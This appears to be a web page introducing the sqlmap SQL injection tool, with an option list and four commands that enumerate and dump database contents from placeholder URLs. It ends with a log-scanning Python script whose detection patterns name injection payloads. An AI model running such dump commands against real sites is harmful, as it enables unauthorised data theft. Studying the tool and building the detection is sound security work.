Multi-Purpose Hacking/Pentesting Tools
What is Sqlmap?
sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It includes a powerful detection engine, many niche features for the penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Is Sqlmap free?
Yes, sqlmap is free to use and works out of the box with Python version 2.6.x and 2.7.x on any platform.
Some options for python sqlmap.py
-h, --help          Show basic help message and exit
-hh                 Show advanced help message and exit
--version           Show program's version number and exit
-v VERBOSE          Verbosity level: 0-6 (default 1)
Target: At least one of these options has to be provided to define the target(s)
-d DIRECT           Connection string for direct database connection
-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
-x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file
-m BULKFILE         Scan multiple targets given in a textual file
-r REQUESTFILE      Load HTTP request from a file
-g GOOGLEDORK       Process Google dork results as target URLs
-c CONFIGFILE       Load options from a configuration INI file
What are the Typical Uses for sqlmap?
sqlmap is written in Python and is considered one of the most powerful and popular SQL injection automation tools available. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and extract database names, tables, columns, and all the data in the tables. Under certain conditions it can even read and write files on the remote file system. sqlmap is like the Metasploit of SQL injection.
How To Install Sqlmap
This tool works best on Linux, preferably a pentesting distribution such as Kali Linux, BackBox or a similar flavour.
sqlmap -u "http://www.yourwebsiteurl.com/section..." --dbs   # (without quotation marks)
sqlmap -u "http://www.yourwebsiteurl.com/section..." -D database_name --tables   # (without quotation marks)
sqlmap -u "http://www.yourwebsiteurl.com/section..." -D database_name -T tables_name --columns   # (without quotation marks)
sqlmap -u "http://www.site.com/section.php?id=51" -D database_name -T tables_name -C column_name --dump   # (without quotation marks)
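On the defending side, the enumeration steps above (databases, tables, columns, dump) show up in web server access logs as injected query strings. The following Python script is an added example, not part of the original page or of sqlmap itself; the log lines, rule names and the functions scan and suspects are constructed for illustration, and the signatures assume a combined-format access log.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /section.php?id=51 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /section.php?id=51%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /section.php?id=51%20UNION%20ALL%20SELECT%20NULL%2Cschema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:00:04 +0000] "GET /section.php?id=52 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:00:05 +0000] "GET /search.php?q=credit+union HTTP/1.1" 200 300 "-" "Mozilla/5.0"
'''

# Captures client IP, request target and User-Agent from one log line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Query-string signatures, matched after URL-decoding.
RULES = {
    "boolean-probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.", re.I),
    "time-delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}

def scan(log_text):
    """Return {client_ip: set(rule names)} for lines that match any signature."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, agent = m.groups()
        # Decode twice so double-encoded payloads (%2520) are also normalised.
        query = unquote_plus(unquote_plus(target.partition("?")[2]))
        hits = {name for name, rx in RULES.items() if rx.search(query)}
        if "sqlmap/" in agent.lower():  # default User-Agent; a client can change it
            hits.add("sqlmap-user-agent")
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return findings

def suspects(findings, min_rules=2):
    """Clients that tripped several distinct signatures are triaged first."""
    return sorted(ip for ip, rules in findings.items() if len(rules) >= min_rules)

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

The User-Agent rule only catches default configurations, so the payload signatures carry most of the detection; the durable fix remains parameterized queries in the application itself.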
Enjoy and use responsibly!